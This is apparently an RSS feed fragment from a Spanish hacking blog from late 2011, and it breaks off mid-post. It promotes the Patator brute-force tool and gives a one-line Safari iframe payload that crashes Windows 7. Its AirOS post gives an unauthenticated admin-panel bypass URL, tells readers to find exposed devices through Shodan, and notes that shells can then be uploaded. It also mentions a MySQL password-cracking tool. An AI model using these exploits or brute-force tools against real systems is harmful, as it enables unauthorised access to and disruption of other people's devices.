&lt;a href="http://2.bp.blogspot.com/-TICv-PD7cmY/TwT8-QaXpwI/AAAAAAAAAds/IwX3TSMuoDo/s1600/patator-tool.bmp" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="195" src="http://2.bp.blogspot.com/-TICv-PD7cmY/TwT8-QaXpwI/AAAAAAAAAds/IwX3TSMuoDo/s320/patator-tool.bmp" width="320" /&gt;&lt;/a&gt;&lt;b&gt;Patator&lt;/b&gt; es una herramienta (script en python) multi-propósito para fuerza bruta, esta herramienta nace del aburrimiento del creador usando otras&amp;nbsp; herramientas para fuerza bruta conocidas como &lt;b&gt;Medusa&lt;/b&gt;, &lt;b&gt;Hydra&lt;/b&gt;, &lt;b&gt;ncrack&lt;/b&gt;, módulos auxiliares de&lt;b&gt; metasploit&lt;/b&gt;, scripts de &lt;b&gt;nmap NSE&lt;/b&gt; y similares porque:&lt;/div&gt;
&lt;ul style="text-align: justify;"&gt;
&lt;li&gt;O bien no funcionan o no son fiables (falsos negativos en varias ocasiones).&lt;/li&gt;
&lt;li&gt;Son lentos (no multi-threaded o no prueban múltiples contraseñas en la misma conexión TCP).&lt;/li&gt;
&lt;li&gt;Carecen de características útiles que ofrece Python (por ejemplo, interactivo en tiempo de ejecución).&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;Por lo cual &lt;b&gt;Patator&lt;/b&gt; es una buena opción si se decepcionan de Medusa, Hydra, ncrack, etc... y otras herramientas de FB, ya que nos ofrece:&lt;br /&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;No escribir el mismo código una y otra vez.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Ejecutar múltiples subprocesos.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Beneficiarse de las características útiles, tales como los comandos de tiempo de ejecución interactiva, el registro de respuesta, etc...&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Actualmente soporta los siguientes módulos:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt; * ftp_login     : Brute-force FTP
 * ssh_login     : Brute-force SSH
 * telnet_login  : Brute-force Telnet
 * smtp_login    : Brute-force SMTP
 * smtp_vrfy     : Enumerate valid users using the SMTP VRFY command
 * smtp_rcpt     : Enumerate valid users using the SMTP RCPT TO command
 * http_fuzz     : Brute-force HTTP/HTTPS
 * pop_passd     : Brute-force poppassd (not POP3)
 * ldap_login    : Brute-force LDAP
 * smb_login     : Brute-force SMB
 * mssql_login   : Brute-force MSSQL
 * oracle_login  : Brute-force Oracle
 * mysql_login   : Brute-force MySQL
 * pgsql_login   : Brute-force PostgreSQL
 * vnc_login     : Brute-force VNC
 * dns_forward   : Forward lookup subdomains
 * dns_reverse   : Reverse lookup subnets
 * snmp_login    : Brute-force SNMPv1/2 and SNMPv3
 * unzip_pass    : Brute-force the password of encrypted ZIP files
 * keystore_pass : Brute-force the password of Java keystore files&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Ojo!&lt;/b&gt; que está herramienta no es recomendada para personas que se aburrieron de Medusa, Hydra... por no saber como usarlas, es sólo por si no les dieron el resultado esperado. El autor deja una nota de esta herramienta diciendo que &lt;i&gt;&lt;b&gt;NO es amigable para script-kiddie&lt;/b&gt;&lt;/i&gt;, ya que su funcionamiento requiere de muchas más variables que otras tools por eso también es más efectiva.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En la web del autor dejan muy claro como usarla, no voy a incluir aquí como usarlo ya que estoy informando de la herramienta y no estoy haciendo su manual de uso.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Web del proyecto:&lt;/b&gt; &lt;a href="http://code.google.com/p/patator/"&gt;http://code.google.com/p/patator/&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;script type="text/javascript"&gt;
&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 234 x 60 */
google_ad_slot = "4419380572";
google_ad_width = 234;
google_ad_height = 60;
//--&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://patator.googlecode.com/files/patator_v0.3.py"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;DESCARGA Pataror V0.3&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Salu2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Zion3R&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-410422475037270260?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/NU0TtvjLW1BrBehJjP1Ox-Me0ag/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NU0TtvjLW1BrBehJjP1Ox-Me0ag/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/NU0TtvjLW1BrBehJjP1Ox-Me0ag/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NU0TtvjLW1BrBehJjP1Ox-Me0ag/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/iP8oT7vI3mc" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-04T22:42:08.822-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-TICv-PD7cmY/TwT8-QaXpwI/AAAAAAAAAds/IwX3TSMuoDo/s72-c/patator-tool.bmp" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/01/patator-herramienta-multi-proposito.html</feedburner:origLink></item><item><title>Feliz Año Nuevo (FIN del Mundo) 2012!</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/j1wcoUTandA/feliz-ano-nuevo-fin-del-mundo-2012.html</link><category>Blackploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 31 Dec 2011 19:44:42 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-404116910461485411</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-gHhJSIzL3n0/Tv5dPc1C7hI/AAAAAAAAAdU/F2mh6775LHE/s1600/2012-fin-du-monde.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="480" src="http://4.bp.blogspot.com/-gHhJSIzL3n0/Tv5dPc1C7hI/AAAAAAAAAdU/F2mh6775LHE/s640/2012-fin-du-monde.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Se viene el anunciado 2012; muerte, hambre, destrucción, cambios climáticos, desastres nucleares, cataclismos se han presagiado... En verdad eso ya pasó en este pasado 2011 y poniéndose un poco más realista, se viene un año decisivo para el hacktivismo, aun así no creo que el mundo se acabe.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
El pasado 2011 se abrió el paso al hacktimismo mundial en son de la conciencia social y nacieron grupos que resguardados bajo el anonimato de la red han sacado su voz de entre las tinieblas y con el firme pensamiento de que se puede hacer o evitar cambios en la sociedad sin necesidad de ser un &lt;i&gt;pez gordo&lt;/i&gt;, han logrado unificar fuerzas en la red para desenmascarar problemáticas de diferentes índoles, de pasada dejando en evidencia precarios y vulnerables sistemas de seguridad de reconocidas empresas y corporaciones.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Es así como este 2011 nos ha dejado muchas confidencias de lo que se teje entre los gobiernos (muchos trucos sucios) gracias a los hacks memorables de grupos hacktivistas (no solamente Anonymous) y a los cables de WikiLeaks.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&amp;nbsp;Así que este 2012 se nos viene jugoso y noticioso, y quien sabe que vaya a pasar, es todo incierto...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En fin, espero que tengan un &lt;b&gt;FELIZ AÑO NUEVO 2012&lt;/b&gt; y espero también poder seguir acompañándolos este 2012 para escribirles más posts y todo lo que acontezca.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
[+] Salu2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Zion3R 2012 &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-404116910461485411?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/GInNq_6oyTUWM4CN17CuuLtfFZA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GInNq_6oyTUWM4CN17CuuLtfFZA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/GInNq_6oyTUWM4CN17CuuLtfFZA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GInNq_6oyTUWM4CN17CuuLtfFZA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/j1wcoUTandA" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-01T00:44:42.166-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-gHhJSIzL3n0/Tv5dPc1C7hI/AAAAAAAAAdU/F2mh6775LHE/s72-c/2012-fin-du-monde.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/12/feliz-ano-nuevo-fin-del-mundo-2012.html</feedburner:origLink></item><item><title>BSOD (Blue Screen Of Death) En Win7 Via Safari</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/Esc7fxbTR3M/bsod-blue-screen-of-death-en-win7-via.html</link><category>Bug</category><category>Seguridad Web</category><category>Exploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 31 Dec 2011 08:03:11 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-5798461415605891525</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://3.bp.blogspot.com/-lRRx-qyQlqo/Tv8u7kpvAfI/AAAAAAAAAdg/W3MSINi_dPU/s1600/BSOD-Safari.bmp" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="139" src="http://3.bp.blogspot.com/-lRRx-qyQlqo/Tv8u7kpvAfI/AAAAAAAAAdg/W3MSINi_dPU/s200/BSOD-Safari.bmp" width="200" /&gt;&lt;/a&gt;Para los que no se enteraron, salió a luz una simple vulneravilidad (&lt;i&gt;Safari Iframe Vulnerability 20.12.2011&lt;/i&gt;) que provoca un BSOD (Pantallazo Azul (de la muerte)) al abrir un archivo &lt;b&gt;*.html&lt;/b&gt; con un iframe que excede el tamaño soportado por Safari.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Datos del Exploit :&lt;/b&gt;&amp;nbsp; &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
# Exploit Title: GdiDrawStream BSoD&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
# Date: 18-12-2011&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
# Author: webDEViL&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
# Version: Latest&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
# Tested on: Windows 7 x64 using Safari&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
# http://twitter.com/w3bd3vil&lt;/div&gt;
&lt;br /&gt;
La vulnerabilidad se explota simplemente poniendo en un archivo &lt;b&gt;*.html&lt;/b&gt; el siguiente código:
&lt;code&gt;&lt;/code&gt;&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;iframe height='18082563'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&amp;nbsp;Después simplemente al abrir el &lt;b&gt;*.html&lt;/b&gt; con Safari se general el BSOD.&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe allowfullscreen="" frameborder="0" height="480" src="http://www.youtube.com/embed/u-62ZqrhD2k" width="640"&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 234 x 60 */
google_ad_slot = "4419380572";
google_ad_width = 234;
google_ad_height = 60;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;br /&gt;
Eso nada más...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-5798461415605891525?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/OeLuJIi6bmn_9pkK7pCb5t0Lmpo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/OeLuJIi6bmn_9pkK7pCb5t0Lmpo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/OeLuJIi6bmn_9pkK7pCb5t0Lmpo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/OeLuJIi6bmn_9pkK7pCb5t0Lmpo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/Esc7fxbTR3M" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-31T13:03:11.349-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-lRRx-qyQlqo/Tv8u7kpvAfI/AAAAAAAAAdg/W3MSINi_dPU/s72-c/BSOD-Safari.bmp" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/12/bsod-blue-screen-of-death-en-win7-via.html</feedburner:origLink></item><item><title>0day en AirOS (Acceso como Root)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/CcxC6G51MNk/0day-en-airos-acceso-como-root.html</link><category>Bug</category><category>Seguridad Web</category><category>0-day</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Fri, 30 Dec 2011 19:41:19 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-3168083266468638600</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://2.bp.blogspot.com/-3_VRy41kPsA/TvkE5H4_QRI/AAAAAAAAAcw/wqoGolMrd70/s1600/AirOS.bmp" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-3_VRy41kPsA/TvkE5H4_QRI/AAAAAAAAAcw/wqoGolMrd70/s1600/AirOS.bmp" /&gt;&lt;/a&gt;Bueno, me ha llegado un mail bastante interesante sobre un 0day en Arios, y no sé de que tanto tiempo estemos hablando, pero revisando un poco me he dado cuenta que sigue muy vigente...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Y esto decia el mail:&lt;/div&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;AirOS remote root 0day

since some genius decided to write worm for this, here is early santa for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)&lt;/code&gt;&lt;/pre&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;div style="text-align: justify;"&gt;
Lo que dice es que es una manera de obtener acceso al panel de administrador de AirOS sin autentificarse, es una suerte de bypass, y es bastante simple, también dice que algún genio inventó un gusano que se aprovecha de esto, así que nos lo deja de regalo de navidad...&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Si no entendieron mucho, entro a explicar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;AirOS&lt;/b&gt; creado por &lt;b&gt;Ubiquiti&lt;/b&gt; se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas). &lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Bueno, la vulnerabilidad que ya fue parchada en la última versión, pero que sigue siendo muy explotable, simplemente en determinado servidor que tenga AirOS hay que cambiar los valores de la url y ya está, se tiene acceso al panel de admin sin necesidad de contraseña:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Url de logeo sin modificar:&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;http://X.X.X.X/login.cgi?uri=/&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
Acceso al panel de admin sin autentificación:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;http://X.X.X.X/admin.cgi/sd.css&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Wx6uI8MaDh8/TvkJvTW71TI/AAAAAAAAAc8/9JeXjiX-C3M/s1600/0day+en+AirOS+%25281%2529.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="318" src="http://1.bp.blogspot.com/-Wx6uI8MaDh8/TvkJvTW71TI/AAAAAAAAAc8/9JeXjiX-C3M/s640/0day+en+AirOS+%25281%2529.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Una vez bypasseado pueden subir archivos (como una shell), pueden ejecutar comandos, lo que se les ocurra...&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-cApFzrjv1rY/TvkKUTLRb0I/AAAAAAAAAdI/kE3p66W_na8/s1600/0day+en+AirOS+%25282%2529.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="588" src="http://3.bp.blogspot.com/-cApFzrjv1rY/TvkKUTLRb0I/AAAAAAAAAdI/kE3p66W_na8/s640/0day+en+AirOS+%25282%2529.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Para encontrar servidores con AirOS simplemente usar el todopoderoso SHODAN:&lt;br /&gt;
&lt;a href="http://www.shodanhq.com/search?q=airos"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;http://www.shodanhq.com/search?q=airos&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;script type="text/javascript"&gt;
&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-3168083266468638600?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/rZK4lbQYTC-4QfzOUNFd0ihacKo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rZK4lbQYTC-4QfzOUNFd0ihacKo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/rZK4lbQYTC-4QfzOUNFd0ihacKo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/rZK4lbQYTC-4QfzOUNFd0ihacKo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/CcxC6G51MNk" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-31T00:41:19.350-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-3_VRy41kPsA/TvkE5H4_QRI/AAAAAAAAAcw/wqoGolMrd70/s72-c/AirOS.bmp" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/12/0day-en-airos-acceso-como-root.html</feedburner:origLink></item><item><title>Feliz Navidad les desea Blackploit!</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/d3XFz5RbofU/feliz-navidad-les-desea-blackploit.html</link><category>Blackploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 24 Dec 2011 10:41:54 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-1911042619811724927</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
Feliz navidad a todos les desea Blackploit!, con el compromiso de poder seguir aportando en el&amp;nbsp;futuro...&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
[+] Salu2&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
[+] Zion3R&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-eYT5u3SAD6M/TvYcI6PqQSI/AAAAAAAAAcY/Z76G-B1249E/s1600/xmas.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-eYT5u3SAD6M/TvYcI6PqQSI/AAAAAAAAAcY/Z76G-B1249E/s1600/xmas.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-1911042619811724927?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nwafno4yPQV8y5KWpRYBvvBYm1A/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nwafno4yPQV8y5KWpRYBvvBYm1A/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nwafno4yPQV8y5KWpRYBvvBYm1A/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nwafno4yPQV8y5KWpRYBvvBYm1A/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/d3XFz5RbofU" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-24T15:41:54.355-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-eYT5u3SAD6M/TvYcI6PqQSI/AAAAAAAAAcY/Z76G-B1249E/s72-c/xmas.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/12/feliz-navidad-les-desea-blackploit.html</feedburner:origLink></item><item><title>[MySQL Password Auditor] Auditoría &amp; Recuperación de Contraseñas MySQL</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/jQZqvI4wsc0/mysqlpasswordauditor.html</link><category>MySQL</category><category>Herramientas</category><category>Hack T00LZ</category><category>Brute Force</category><category>Fuerza Bruta</category><category>Web T00LZ</category><category>Programas Windows</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 31 Dec 2011 07:37:16 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-136396153691128579</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-S7BsUXwY-KU/TvO6otFf4xI/AAAAAAAAAbo/BYNKeSmSoTc/s1600/mysqlpasswordauditor_banner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="92" src="http://1.bp.blogspot.com/-S7BsUXwY-KU/TvO6otFf4xI/AAAAAAAAAbo/BYNKeSmSoTc/s640/mysqlpasswordauditor_banner.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Desde &lt;a href="http://securityxploded.com/mysql-password-auditor.php"&gt;SecurityXploded&lt;/a&gt; les traigo &lt;b&gt;MysqlPasswordAuditor&lt;/b&gt; que es un programa gratuito de recuperación de contraseña de MySQL (uno de los software de bases de datos más potentes y utilizadas por la mayoría de las aplicaciones y servidores web).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;MysqlPasswordAuditor&lt;/b&gt; ayuda a la recuperación de la contraseña de un servidor MySQL y puede ser usada para auditar bases de datos Mysql y descubrir contraseñas débiles.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
